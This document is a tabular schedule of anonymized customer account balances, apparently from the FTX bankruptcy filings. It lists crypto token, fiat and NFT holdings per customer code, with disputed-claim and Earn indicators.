| 07300000 | | BTC[0.00001110], SUSHI[.454875], TRX[.000002], USD[1.85], USDT[0] | | |
| 07300001 | | USD[20.00] | | |
| 07300002 | | BTC[0], SOL[0], USD[0.01] | | |
| 07300009 | | USD[2.35] | | |
| 07300010 | | USD[0.26], USDT[0] | | |
| 07300011 | | BCH[0], BTC[0], DOGE[0.00000001], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], NFT (350668802600238815/2974 Floyd Norman - OKC 2-0222)[1], PAXG[0], SOL[0.00000001], SUSHI[0], TRX[0], UNI[0], USD[0.00], WBTC[0], YFI[0.00000001] | | |
| 07300017 | | USDT[.558213] | | |
| 07300019 | Contingent, Disputed | TRX[.000008] | | |
| 07300020 | | USD[1.00] | | |
| 07300023 | | BCH[.00011081], BTC[0], ETH[0], GRT[.904], LINK[.0814], TRX[.7746794], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07300026 | | USD[0.13] | | |
| 07300028 | | USD[0.42] | | |
| 07300029 | | USD[0.22] | | |
| 07300031 | | USD[0.16] | | |
| 07300032 | | USD[0.46] | | |
| 07300035 | | USD[50.00], USDT[0.00008168] | | |
| 07300037 | | USD[35.00] | | |
| 07300042 | | BTC[0], DOGE[0], GRT[0], SUSHI[0], USD[0.24] | | |
| 07300043 | | BTC[0], ETHW[13.3], USD[0.37] | | |
| 07300044 | | USD[0.03] | | |
| 07300046 | | USD[2.39] | | |
| 07300047 | | USD[0.00], USDT[0] | | |
| 07300048 | | ETH[.841789], ETHW[.841789], USD[9.93] | | |
| 07300052 | | BTC[0], SOL[0.01736117], USD[0.01], USDT[0.00000085] | | |
| 07300057 | | SHIB[3996000], USD[0.60] | | |
| 07300060 | | ETH[.00021562], ETHW[.00021562], SOL[0], USD[0.01], USDT[0] | | |
| 07300062 | | BTC[.00048266], DOGE[159.19273438], ETH[.006261], PAXG[.00601107], USD[0.08] | | |
| 07300063 | | BCH[0], BF_POINT[300], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], NFT (305731120176316502/Sun Set #593)[1], NFT (329706749401299322/Cosmic Creations #946)[1], NFT (331908345455450373/Golden Hill #89)[1], NFT (375736894525647579/FTX - Off The Grid Miami #13)[1], NFT (386788853709287921/Golden Hill #868)[1], NFT (422382927077049104/Humpty Dumpty #366)[1], NFT (422544826461531482/Morning Sun #439)[1], NFT (564444718364491149/Saudi Arabia Ticket Stub #373)[1], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07300064 | | NFT (559692320671571728/Humpty Dumpty #592)[1], USD[18.85] | | |
| 07300071 | | NFT (433989382905072749/Entrance Voucher #2693)[1], NFT (470973013386075163/FTX - Off The Grid Miami #485)[1], USD[2.01] | | |
| 07300072 | | USD[50.00] | | |
| 07300073 | | USD[0.02] | | |
| 07300075 | | USD[0.08] | | |
| 07300076 | | USD[0.03] | | |
| 07300079 | | USD[100.00] | | |
| 07300088 | | BTC[0], USD[50.00] | | |
| 07300094 | | USDT[0.00000915] | | |
| 07300095 | | USD[227.73] | | |
| 07300104 | | ETH[.00000001], USD[0.00], USDT[0] | | |
| 07300107 | | USD[1214.37] | | |
| 07300108 | | TRX[1.000214], USD[0.00], USDT[0.00000002] | | |
| 07300115 | | BF_POINT[300] | | |
| 07300117 | | USD[1.80] | | |
| 07300120 | | USD[0.00] | | |
| 07300121 | | USD[0.00] | | |
| 07300122 | | USDT[2.231538] | | |
| 07300123 | | NFT (443146638305928171/Entrance Voucher #3525)[1], USD[0.06], USDT[0] | | |
| 07300124 | | USD[1.72] | | |
| 07300126 | | PAXG[.0027888], USD[0.01] | | |
| 07300128 | | USD[50.00] | | |
| 07300129 | | ETH[0], SOL[0], USD[1.04], USDT[0.01268651] | | |
| 07300130 | | BTC[0], ETH[.00000001], ETHW[0], SUSHI[.00000001], USD[0.00] | | |
| 07300132 | | BTC[.0301698], ETH[.921616], ETHW[.000821], SOL[33.85611], USD[3.24], USDT[4.52798] | | |
| 07300133 | | BTC[.005] | | |
| 07300134 | | TRX[.000004], USD[0.00], USDT[0] | | |
| 07300137 | | BTC[0], DOGE[.096], ETHW[2.68909825], LINK[9.96], USD[0.06], USDT[0] | | |
| 07300139 | | USD[68.11] | | |
| 07300143 | | BTC[0], DOGE[.174], ETHW[.000704], NFT (472083262225884504/Paradigm Shift)[1], SOL[0.00258000], USD[0.82], USDT[0.00136730], WBTC[0] | | |
| 07300144 | | NFT (369432739560519130/Sun Set #296)[1], NFT (399202079702771113/Colossal Cacti #230)[1], NFT (414153993083765790/Reflector #792)[1], NFT (462365048760627529/Ferris From Afar #776)[1], NFT (474391319861295567/Reflection '11 #77)[1], USD[33.84], USDT[0.00000001] | | |
| 07300148 | | BF_POINT[100], USD[11686.46] | | |
| 07300151 | | AAVE[.16988], BCH[.008853], BCHA[.030382], BTC[0.00005722], DOGE[.999], ETH[.00096], ETHW[.00096], PAXG[.0000731], TRX[.976], USD[127.63], USDT[0.00295879] | | |
| 07300155 | | NFT (313082391112780616/Lunarian #644)[1], NFT (342143848220471758/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #52)[1], NFT (393388321943922809/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #26)[1], NFT (428020682224478944/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #26)[1], SOL[.00006], USD[1.37] | | |
| 07300156 | | ETHW[15.85755] | | |
| 07300162 | | USD[0.00] | | |
| 07300164 | | NFT (413861900465656840/Miami Grand Prix 2022 - ID: 76BCB92F)[1] | | |
| 07300166 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07300167 | | BTC[0.00003826], DOGE[0.77967954], ETH[0], HKD[0.00], MATIC[3.9632], SOL[0.00020336], TRX[0], USD[7611.07], USDT[0.00568190] | | |
| 07300168 | | BTC[0], SOL[0], USD[0.55] | | |
| 07300169 | | BTC[0], USD[642.03] | | |
| 07300170 | | BCH[0], BTC[0], DOGE[1.66452224], ETH[0], USD[0.00] | | |
| 07300173 | | BCH[.92], BTC[0.00559992], ETH[-0.00623781], ETHW[-0.00603215], SOL[-0.00683713], USD[25000.01] | | |
| 07300174 | | BTC[0], DOGE[0], ETH[0], NFT [455793723774141415/Chosen One #755][1], SOL[0], USD[1799.89] | | |
| 07300178 | | BTC[0.00001958], DOGE[2.454], SOL[.00013232], SUSHI[.2175], USDT[0] | | |
| 07300179 | | BTC[.000079], ETHW[.00007498], SOL[0.00023499], USD[3000.00] | Yes | |
| 07300187 | | BTC[0], ETH[0], USD[0.00] | | |
| 07300190 | | BTC[0], SOL[.00701], USD[0.00] | | |
| 07300191 | | BTC[0.35984387], ETH[4.2930743], ETHW[4.2930743], SOL[34.86675], USD[153.22] | | |
| 07300193 | | SHIB[0], TRX[0], USD[38.30], USDT[0] | | |
| 07300195 | | ALGO[.4158], AVAX[.015925], BTC[.00009637], USD[1.24] | | |
| 07300205 | | BTC[0], ETH[0.00032799], ETHW[0.01232799], SUSHI[.00000001], USD[0.00], USDT[0], YFI[.00000001] | | |
| 07300206 | | USD[0.30], USDT[.005907], XRP[.96] | | |
| 07300207 | | BTC[0.00000740], DOGE[0], ETH[0], LINK[0], MATIC[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07300211 | | USD[0.00] | | |
| 07300215 | Contingent, Disputed | BTC[0], ETH[0], ETHW[0], NFT [490851566931513996/The Hill by FTX #6849][1], USD[28.50] | | |
| 07300217 | | USD[0.82] | | |
| 07300221 | | USD[0.02] | | |
| 07300223 | | BTC[0.00004111], ETH[.0005], ETHW[.0005], SUSHI[.4005], TRX[.000001] | | |
| 07300225 | | USD[0.00] | | |
| 07300239 | | DOGE[0], USD[0.00] | | |
| 07300241 | | DOGE[0], ETH[0], ETHW[0], USD[2.23] | | |
| 07300248 | | NFT [528366441713072396/2974 Floyd Norman - OKC 3-0247][1], SOL[.08] | | |
| 07300249 | | BTC[0], ETH[.00000001], USD[0.00] | | |
| 07300260 | | BTC[0.00000002], CUSDT[1], SHIB[1], SOL[0], TRX[2], USD[1.27] | Yes | |
| 07300263 | | ALGO[10], DAI[10], DOGE[10], MATIC[10], SHIB[110000000.00818988], TRX[10.00001], USD[10.00], USDT[10] | | |
| 07300267 | | USD[0.00] | | |
| 07300268 | | NFT [303251343218456076/GSW Western Conference Finals Commemorative Banner #1543][1], NFT [339873260639158328/GSW Championship Commemorative Ring][1], NFT [359953558485105613/GSW Western Conference Semifinals Commemorative Ticket #946][1], NFT [454618462724836256/GSW Western Conference Finals Commemorative Banner #1544][1], NFT [501425196989142732/Warriors Hoop #15 (Redeemed)][1], USD[500.10] | | |
| 07300272 | | BTC[0], ETH[0], NFT [305410752186824043/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #11][1], SHIB[0], USD[0.21] | | |
| 07300276 | | NFT [361309380526914823/FTX - Off The Grid Miami #2094][1] | | |
| 07300286 | | ETHW[190.702], USD[0.01], USDT[0] | | |
| 07300288 | | TRX[.000009], USD[2.00] | | |
| 07300293 | | BTC[.09454398], ETH[.23297615], ETHW[.23297615], SOL[9.17704258], USD[0.11] | | |
| 07300305 | | BTC[0], ETH[0.00000001], ETHW[.00000001], USD[0.00] | | |
| 07300307 | | BTC[0], USD[0.00] | | |
| 07300308 | | BTC[0], SOL[0], USD[0.00] | | |
| 07300310 | | USD[4.32] | | |
| 07300311 | | BTC[0], LTC[0], PAXG[.00000001], TRX[.00014], USD[0.04], USDT[0.00520000] | | |
| 07300322 | | AVAX[0], BTC[0], DAI[0], ETH[0.00103585], ETHW[0], LINK[0], MATIC[0], SOL[0.00000001], USD[0.00], USDT[0.00000002] | | |
| 07300325 | | BTC[.00001983], USD[16.73] | | |
| 07300329 | | NFT [468849849782505108/FTX - Off The Grid Miami #4802][1] | | |
| 07300336 | | BTC[0], DOGE[0], ETH[0.45081031], ETHW[0.45081031], USD[0.00], XRP[2922.51755617] | | |
| 07300340 | | USDT[0.09445363] | | |
| 07300346 | | USD[2.00] | | |
| 07300348 | | ETH[0], SOL[.0045], UNI[.0888], USD[0.88] | | |
| 07300361 | | USD[424.74] | | |
| 07300370 | | BTC[0], ETH[.03341115], NFT [398841342853807271/Entrance Voucher #4445][1], SOL[3.41], TRX[0], USD[0.00], USDT[0] | | |
| 07300373 | | BTC[0], DAI[0], ETH[.00000001], ETHW[0], KSHIB[0], SHIB[0], USD[0.00], USDT[0.00000001] | | |
| 07300376 | | BTC[0], ETH[.00000001], ETHW[0], LTC[0], TRX[0], USD[0.00], USDT[0.00000020] | | |
| 07300381 | | SOL[5.32580894], USD[0.00] | | |
| 07300388 | | USD[0.23] | | |
| 07300396 | | BTC[.0076], ETH[.146853], ETHW[.146853], USD[3.68] | | |
| 07300398 | | USD[9.87], USDT[.009392] | | |
| 07300407 | | ALGO[0], ETH[0], USD[15.74] | | |
| 07300408 | | BTC[.0495] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07300416 | | BTC[0], NFT (359560866603763989/Sticker)[1], NFT (427309883449541262/Good Boy #160)[1], NFT (571483103819437082/Markers #2)[1], USD[0.19], USDT[0] | | |
| 07300418 | | BF_POINT[200], BTC[0], ETH[0], SOL[.00029], TRX[.000002], USD[0.00], USDT[0] | | |
| 07300425 | | NFT (372528195546295921/Enhanced Blueprints)[1] | | |
| 07300427 | | BTC[.06091849], ETH[6.65975119], ETHW[6.65975119], NFT (393105616019760798/Ballpark Bobblers 2022 - ID: A379DF89)[1], NFT (415827082153743969/The 2974 Collection #0409)[1], NFT (426879174371195266/The 2974 Collection #1864)[1], NFT (474627115967472826/Exclusive 2974 Collection Merchandise Package #939 (Redeemed))[1], NFT (544811248967820248/Exclusive 2974 Collection Merchandise Package #4513 (Redeemed))[1], SOL[.47424868], USD[10002.76] | | |
| 07300431 | | BTC[0], USD[0.14] | | |
| 07300441 | Contingent, Disputed | BTC[.00000491], USD[0.18] | | |
| 07300445 | | TRX[.000045], USD[0.00], USDT[0] | | |
| 07300449 | | NFT (394849580067778993/Entrance Voucher #25921)[1] | | |
| 07300464 | | NFT (572595428796351506/Humpty Dumpty #921)[1] | | |
| 07300471 | | USD[0.75] | | |
| 07300480 | | BTC[0], ETHW[0], SOL[.00000001], USD[1.74], USDT[0.00000001], WBTC[0] | | |
| 07300498 | | SOL[0], USD[0.00] | | |
| 07300510 | | CUSDT[0], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07300516 | | BTC[0], ETH[0], USD[1600.80], USDT[0.00000586] | | |
| 07300517 | | USD[0.07], USDT[0] | | |
| 07300521 | | SOL[0], TRX[30.000001] | | |
| 07300523 | | USD[0.01] | | |
| 07300527 | | BTC[0], USD[0.90], USDT[0] | | |
| 07300531 | | ETH[.00750837], ETHW[.00750837] | | |
| 07300538 | | BTC[0], ETH[0] | | |
| 07300551 | | USDT[0.00000190] | | |
| 07300557 | | BTC[0] | | |
| 07300562 | | BTC[.00006137], LINK[.0006], USD[0.60] | | |
| 07300563 | | USD[0.01] | | |
| 07300564 | | BTC[0], SOL[28.884], SUSHI[.3335], USD[0.97] | | |
| 07300565 | | DOGE[0] | | |
| 07300566 | | USD[8.02] | | |
| 07300568 | | USD[0.00] | | |
| 07300571 | | GRT[0.86700000], USD[302.48] | | |
| 07300574 | | BTC[0], SOL[0], USDT[0.00036837] | | |
| 07300575 | | BTC[.0005], USD[0.00] | | |
| 07300579 | | BAT[390.50923003], BTC[0], DOGE[1185.76659948], ETH[0], GRT[0], SHIB[2715337.04609544], SUSHI[0], UNI[0], USD[0.00], USDT[0], YFI[0.00884448] | | |
| 07300581 | | USD[74.72] | | |
| 07300584 | | DOGE[1503.967], USD[4.81] | | |
| 07300592 | | NFT (393228271597175717/Entrance Voucher #3021)[1], TRX[.000002], USD[60.00] | | |
| 07300594 | | BTC[0.00000045] | | |
| 07300604 | Contingent, Unliquidated, Disputed | BTC[0.03881511], ETH[.0001298], ETHW[.0001298], PAXG[0.00007895], USD[0.00], USDT[0.00013813] | | |
| 07300617 | | SHIB[3196800], USD[1.35] | | |
| 07300623 | | BTC[.001] | | |
| 07300625 | | BTC[0.01075103], ETH[.00992], ETHW[.00992] | | |
| 07300633 | | BTC[0], DAI[.01781262], ETH[0], SHIB[35717.5240685], USD[0.00], USDT[0.00018096] | | |
| 07300636 | | USDT[0.00000041] | | |
| 07300646 | | BTC[0.00601463], ETH[.000512], ETHW[.000512], USDT[87.82328298] | | |
| 07300650 | | NFT (427085297512604581/Miami Ticket Stub #616)[1], USD[0.00] | | |
| 07300662 | | BRZ[1], BTC[.001064465], CUSDT[2], DOGE[3], ETH[1.09804766], NFT (471887652349193599/SMB #3187)[1], SOL[17.33810498], USD[10442.47] | Yes | |
| 07300665 | | BTC[.0001013], ETH[.003], ETHW[.002] | | |
| 07300667 | | USD[0.00], USDT[.00427] | | |
| 07300668 | | ALGO[.049], LINK[.0622], MATIC[9.68], NEAR[.0208], PAXG[.0000262], USD[1.56], USDT[0] | | |
| 07300671 | | BTC[0] | | |
| 07300678 | | USD[0.00] | | |
| 07300688 | | SOL[.32812], USD[0.00], USDT[0] | | |
| 07300691 | | BTC[0], USD[0.00], USDT[2.674807] | | |
| 07300700 | | USD[0.01] | | |
| 07300712 | | USD[0.01] | | |
| 07300728 | | CUSDT[69.984], USD[0.02], USDT[.1796655] | | |
| 07300729 | | CUSDT[2.372], USD[3.76] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07300739 | | NFT (300937355281886545/Romeo #2848)[1], NFT (385764432955565028/Good Boy #11695)[1], NFT (391605456974268895/Humpty Dumpty #652)[1] | | |
| 07300745 | | LTC[.003208], SUSHI[.18737], USD[0.19] | | |
| 07300750 | | BTC[0], ETH[.00000001], TRX[.000003], USD[86098.97], USDT[0], XRP[.936] | | |
| 07300752 | | USD[0.88] | | |
| 07300756 | | USD[0.00] | | |
| 07300757 | | DOGE[0.58015538], LTC[0], TRX[0], USD[0.00] | | |
| 07300762 | | BTC[.0295388], USD[1.44] | | |
| 07300777 | | BTC[0], DOGE[0.00000002], PAXG[0], SOL[0], TRX[.000019], USD[0.00], USDT[0] | | |
| 07300787 | | XRP[9.75] | | |
| 07300788 | | DOGE[1279.719], USD[0.05], USDT[.00298] | | |
| 07300789 | | USD[0.00] | | |
| 07300792 | | BTC[0], DOGE[0], ETH[.00000001], USD[6.10], USDT[0] | | |
| 07300802 | | BTC[0], NFT (292485687570654973/GSW Western Conference Semifinals Commemorative Ticket #947)[1], NFT (306179454511777036/Warriors Hoop #11 (Redeemed))[1], NFT (336271539582256962/GSW Championship Commemorative Ring)[1], NFT (483297276172190694/GSW Western Conference Finals Commemorative Banner #2097)[1], NFT (494185318934556985/GSW Round 1 Commemorative Ticket #653)[1], NFT (542795237480213902/GSW Western Conference Finals Commemorative Banner #2098)[1], USD[14.75] | | |
| 07300806 | | BTC[0], USD[0.00], USDT[0] | | |
| 07300817 | | USD[0.00] | | |
| 07300822 | | NFT (293490145554335413/FTX Crypto Cup 2022 Key #686)[1] | | |
| 07300826 | | USD[0.00] | | |
| 07300827 | | ETH[.00038953], ETHW[0.00038952], USD[0.05] | | |
| 07300833 | | BTC[.0000996], DAI[.088], USD[0.00] | | |
| 07300847 | | DOGE[0], ETH[0], LTC[0], TRX[0], USD[1.00], USDT[0] | | |
| 07300859 | | USD[30.00] | | |
| 07300861 | | BTC[0], ETH[0], SOL[0], USD[0.00] | | |
| 07300862 | | DOGE[.508], NFT (302510457205655770/Starry Night #224)[1], SOL[.00077712], USD[38.52] | | |
| 07300895 | | BF_POINT[800], BTC[0], USD[473.79] | | |
| 07300900 | | BTC[0], ETH[.00000007], ETHW[0.41740407], NFT (316973805639859237/The 2974 Collection #2589)[1], NFT (430722425924594781/2974 Floyd Norman - CLE 2-0235)[1], NFT (457756533663620506/Birthday Cake #2589)[1], NFT (510344045623519153/2974 Floyd Norman - OKC 6-0169)[1], SOL[0], USD[0.00] | | |
| 07300903 | | AAVE[.15924], BTC[0.00128299], DOGE[142.924], NFT (391236552767104733/FTX - Off The Grid Miami #2416)[1], TRX[331.668], UNI[2.1393125], USD[2.04], USDT[0.00900468] | | |
| 07300922 | | NFT (400044508487651487/Imola Ticket Stub #675)[1] | | |
| 07300925 | | BTC[0.00001667] | | |
| 07300937 | | BTC[0] | | |
| 07300943 | | MATIC[1.74098188] | | |
| 07300948 | | USD[0.00] | | |
| 07300962 | | TRX[.000001], USD[0.00], USDT[60.00651338] | | |
| 07300964 | | BTC[0], ETH[.000091], ETHW[.000091], USD[0.00] | | |
| 07300968 | | USD[0.01] | | |
| 07300972 | | ETH[.00000001], ETHW[0], USD[0.00], USDT[0] | | |
| 07300986 | | USD[0.00] | | |
| 07300993 | | SOL[.24783938], USD[1.72], USDT[0] | | |
| 07301007 | | USD[0.00] | | |
| 07301008 | | USDT[7.06424902] | | |
| 07301009 | | AVAX[.87566179], BTC[.00852929], ETH[.05520089], ETHW[0.05520088], USD[56.01] | | |
| 07301012 | | USD[0.00] | | |
| 07301018 | Contingent, Unliquidated | USD[12.01], USDT[0.00001127] | | |
| 07301038 | | MATIC[170], USD[0.00], USDT[0] | | |
| 07301044 | | NFT (314769401874341761/APEFUEL by Almond Breeze #302)[1], NFT (375043847298134173/Bahrain Ticket Stub #2015)[1] | | |
| 07301045 | | NFT (422762359570483146/Cool Bean #3243)[1] | | |
| 07301053 | | SOL[34.86], SUSHI[34.863], USDT[37.85934] | | |
| 07301069 | | NFT (545007162750612741/Coachella x FTX Weekend 2 #24330)[1] | | |
| 07301073 | | ALGO[0], AVAX[0], BTC[0], ETH[0], PAXG[0], SOL[0], USD[0.00], USDT[0] | | |
| 07301075 | | ETH[0], USD[0.01], USDT[0.00000001] | | |
| 07301080 | Contingent, Disputed | BTC[.1455156], USD[4.70] | | |
| 07301083 | | BTC[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07301102 | | CUSDT[.992], USD[0.04], USDT[.00030844] | | |
| 07301109 | | BTC[0.00551061], USD[4.26], USDT[0.00003457] | | |
| 07301111 | Contingent, Disputed | BTC[0], USD[0.25] | | |
| 07301116 | | AAVE[.05519699], ETH[.00000649], ETHW[16.18009649], NFT (351152985950856366/Entrance Voucher #29355)[1], NFT (447466892971304872/FTX - Off The Grid Miami #379)[1], USD[0.00] | | |
| 07301131 | | DOGE[.62662568], USD[0.00] | | |
| 07301137 | | NFT (454956566526886058/First #1)[1], NFT (493213792351346783/Rainbow #180)[1], NFT (527686963947546599/Kmc97 #1)[1], SOL[5.2], USD[84.33] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07301156 | | TRX[.000002] | | |
| 07301165 | | BTC[.05998805], USDT[0.00018948] | | |
| 07301167 | | BTC[0], DOGE[.706], USD[0.00] | | |
| 07301175 | | BTC[0.01503670], USD[0.00] | | |
| 07301189 | | BTC[0.00312858], ETH[.01241955], ETHW[.01241955], USD[0.01] | | |
| 07301191 | | USD[0.13] | | |
| 07301197 | | USD[1.22] | Yes | |
| 07301211 | | BTC[0.00119672], ETH[0.00042349], ETHW[0.00042349], USD[-7.16] | | |
| 07301223 | | BTC[.00010766], ETH[.00056513], ETHW[.00056513], MATIC[.4675], SOL[.00766], USD[0.00] | | |
| 07301228 | | SOL[.00868116] | | |
| 07301231 | | BTC[0], CUSDT[.3394], ETHW[2.81009335], LINK[88.720415], USD[2.17], USDT[0] | | |
| 07301233 | | BTC[0.00002183], DAI[.00000001], DOGE[.095775], ETH[0], NFT (529866543632481302/Entrance Voucher #29526)[1], SOL[0.00000001], USD[0.14], USDT[0] | | |
| 07301236 | | USDT[0.00000009] | | |
| 07301238 | | BTC[0], USD[0.01] | | |
| 07301240 | | DOGE[.112], LINK[.040825], MATIC[10266], SHIB[188216.875113], USD[1.12], USDT[.6280525] | | |
| 07301243 | | USD[0.01] | | |
| 07301247 | | NFT (409055504457977764/FTX - Off The Grid Miami #2451)[1], NFT (462036329933934643/Imola Ticket Stub #2019)[1] | | |
| 07301257 | | USDT[0.00000221] | | |
| 07301259 | | BTC[0], ETHW[2.394525], PAXG[0.00004597], USD[0.00], USDT[0] | | |
| 07301263 | | USD[0.00] | | |
| 07301267 | | BTC[0], SOL[0], SUSHI[.00000001], TRX[.000006], USD[0.16], USDT[0.00000001] | | |
| 07301270 | | USD[500.00] | | |
| 07301273 | | ETH[.00032584], ETHW[.00032584], USD[0.00], USDT[0] | | |
| 07301280 | | USD[0.15] | | |
| 07301281 | | BTC[0], SOL[.0076], SUSHI[.322], TRX[.779825], USD[18.88], USDT[2.15516347] | | |
| 07301284 | | USD[22.94] | | |
| 07301306 | | USD[0.40], USDT[0] | | |
| 07301309 | | USD[0.00] | | |
| 07301310 | | ETHW[.34503542], SUSHI[0], USD[0.00] | | |
| 07301311 | | NFT (494553546176644640/EMP Shockwave [PL])[1] | | |
| 07301313 | | BTC[.00012009] | | |
| 07301315 | | AAVE[0], AVAX[0], BCH[0], BTC[0], DOGE[.80536085], ETH[0], LINK[0], MATIC[0], NEAR[0], SHIB[0], SOL[0.00000001], SUSHI[0], UNI[0], USD[0.00], USDT[0.00000733], YFI[0] | | |
| 07301318 | | USD[1.00] | | |
| 07301320 | | LTC[2.52291055], PAXG[.50636299], USD[0.00] | | |
| 07301321 | | USD[0.00] | | |
| 07301322 | | BTC[0.49574983], DOGE[0.52343436], ETH[7.529422], ETHW[.000422], USD[-14911.16] | | |
| 07301326 | | AUD[0.00], BCH[.0589764], BRZ[0.00274728], BTC[0.00459355], ETH[0], ETHW[0], USD[12.38], USDT[5.00162100], XRP[11.14605605] | | |
| 07301327 | | BTC[.03317921] | | |
| 07301330 | | USD[0.00] | | |
| 07301342 | | BTC[.00268974], GRT[.6694], LINK[.05478], PAXG[.00189278], SUSHI[.439675], UNI[.06504], USD[1272.41] | | |
| 07301348 | | NFT (373443982475025544/Romeo #1851)[1], NFT (481963584742999992/FTX - Off The Grid Miami #2386)[1], NFT (490343252333598313/Microphone #9482)[1], NFT (501297710600086823/Entrance Voucher #4675)[1] | | |
| 07301352 | | ETH[0.0009028], USD[0.01] | | |
| 07301354 | | SOL[2.071], USD[3.00] | | |
| 07301361 | | BTC[0], ETH[0.00000002], ETHW[0.00000003], NFT (490963288015558053/FTX - Off The Grid Miami #1837)[1], SOL[0], USD[0.46], USDT[0.00000001] | | |
| 07301366 | | USD[0.46] | | |
| 07301382 | | USD[0.20] | | |
| 07301384 | | BTC[0], ETH[0], ETHW[0], GRT[0], SOL[0], USD[0.00], USDT[0] | | |
| 07301393 | | USD[0.00] | | |
| 07301404 | | NFT (377174061560299639/Humpty Dumpty #715)[1], NFT (493128166314533885/Wombats in Disguise #61)[1] | | |
| 07301407 | | USD[0.00] | | |
| 07301413 | | USD[100.00] | | |
| 07301416 | | NFT (298492168732724600/Munch moon)[1], NFT (302849713023512885/MagicEden Vaults)[1], NFT (307099107505572980/Degen Banana #3356)[1], NFT (320043050229255388/DinoBitten)[1], NFT (339608342558995446/Aurorian #1784)[1], NFT (348774684879212189/Bloombell)[1], NFT (358381185919167105/Crystal Egg)[1], NFT (422186310193920452/MagicEden Vaults)[1], NFT (426282280167717718/Degen Banana #3356)[1], NFT (445089418667001056/Degen Ape #7009)[1], NFT (472165057325883621/Degen Trash Panda Merch Token)[1], NFT (490147692305267776/Uahka Nightmare)[1], NFT (523519700291454088/Helios 3D)[1], NFT (531927557906832167/MagicEden Vaults)[1], NFT (537690117664372889/MagicEden Vaults)[1], NFT (539054409046216137/Kitty Key)[1], NFT (549579552895857761/MagicEden Vaults)[1], NFT (574068302710728621/PepperMint)[1], SOL[.3], USDT[0.00000005] | | |
| 07301439 | | MATIC[7.55], USD[15.00] | | |
| 07301440 | | USD[252.87] | | |
| 07301441 | | BTC[0], ETH[0], USD[10.18], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07301443 | | USD[0.53] | | |
| 07301451 | | NFT (34106300342794755/Sigma Shark #5177)[1], NFT (391361194922340602/Sigma Shark #6635)[1], NFT (51100563551500114/Sigma Shark #5294)[1], SOL[.00000001], USD[0.00] | | |
| 07301460 | | ALGO[.85], BCH[.000679], BTC[.0001018], ETHW[.571], GRT[654.342], LINK[.7], MATIC[30], USD[0.63] | | |
| 07301468 | | ETH[1.1988], ETHW[1.1988], SOL[210.87733], SUSHI[194.5], USD[4.01] | | |
| 07301476 | | USD[1.84] | | |
| 07301480 | | SOL[0], USD[0.00], USDT[0.17339989] | | |
| 07301507 | | BTC[0], ETH[0], MATIC[.0001], NFT (321706582385690068/The Hill by FTX #6918)[1], NFT (351273820238442515/Entrance Voucher #3753)[1], NFT (573802918141840037/Good Boy #34)[1], USD[0.00], USDT[0.00010635] | | |
| 07301520 | | USD[2.82] | | |
| 07301522 | | USD[50.00] | | |
| 07301531 | | BTC[0.00003837], LINK[.0811525], USD[1.38], USDT[0.05982756] | | |
| 07301533 | | DOGE[1282.848], LTC[2.988], USD[0.24] | | |
| 07301537 | | UNI[4.5954], USD[1.65] | | |
| 07301538 | | BTC[0], LTC[0], USD[0.00], USDT[0] | | |
| 07301544 | | ETH[0], LTC[.00804], USD[0.15] | | |
| 07301550 | | BCH[.000316], BTC[0], DOGE[.268], ETHW[.000112], SOL[.00003], USD[3958.47], USDT[0.00000328] | | |
| 07301558 | | AVAX[.7], USD[1.20], USDT[0] | | |
| 07301562 | | BTC[.0007619] | | |
| 07301571 | | BTC[0], USD[0.00] | | |
| 07301574 | | USD[0.00] | | |
| 07301577 | | BTC[0] | | |
| 07301580 | | SOL[0], USD[0.00] | | |
| 07301589 | | CUSDT[999], USD[0.00], XRP[235.764] | | |
| 07301600 | | DOGE[.072], USD[0.01], USDT[5.1270508] | | |
| 07301602 | | BTC[0], DAI[0], ETH[0], MATIC[0], SOL[0], USD[0.00] | | |
| 07301607 | | BTC[0], USDT[0.00001687] | | |
| 07301608 | | BTC[0], DOGE[0], NFT (346898605950379305/Microphone #70)[1], NFT (377285815715271494/FTX - Off The Grid Miami #1243)[1], NFT (548151366188681943/Imola Ticket Stub #249)[1], SOL[0], USD[0.01], USDT[0] | Yes | |
| 07301615 | | XRP[.003341] | | |
| 07301619 | | ETH[0.00000001], SOL[.00000001], USD[2.64] | | |
| 07301633 | | SOL[.54], USDT[6.5678232] | | |
| 07301640 | | ETH[.00000001], ETHW[.00000001], LINK[0], USD[0.01], USDT[0] | | |
| 07301642 | | BTC[0], DOGE[0], ETH[0], ETHW[0.00500000], LTC[0], NFT (426733763984130291/Romeo #213)[1], NFT (473888312250091634/Romeo #200)[1], NFT (541212929115178108/Entrance Voucher #3526)[1], SOL[0], USD[0.00], WBTC[0] | | |
| 07301662 | | ETH[0.00074556], ETHW[0.00074556], MATIC[101.33179026], SOL[.99905], TRX[.011146], USD[0.00] | | |
| 07301665 | | USD[2.91] | | |
| 07301667 | Contingent, Disputed | SOL[96], USD[6030.00] | | |
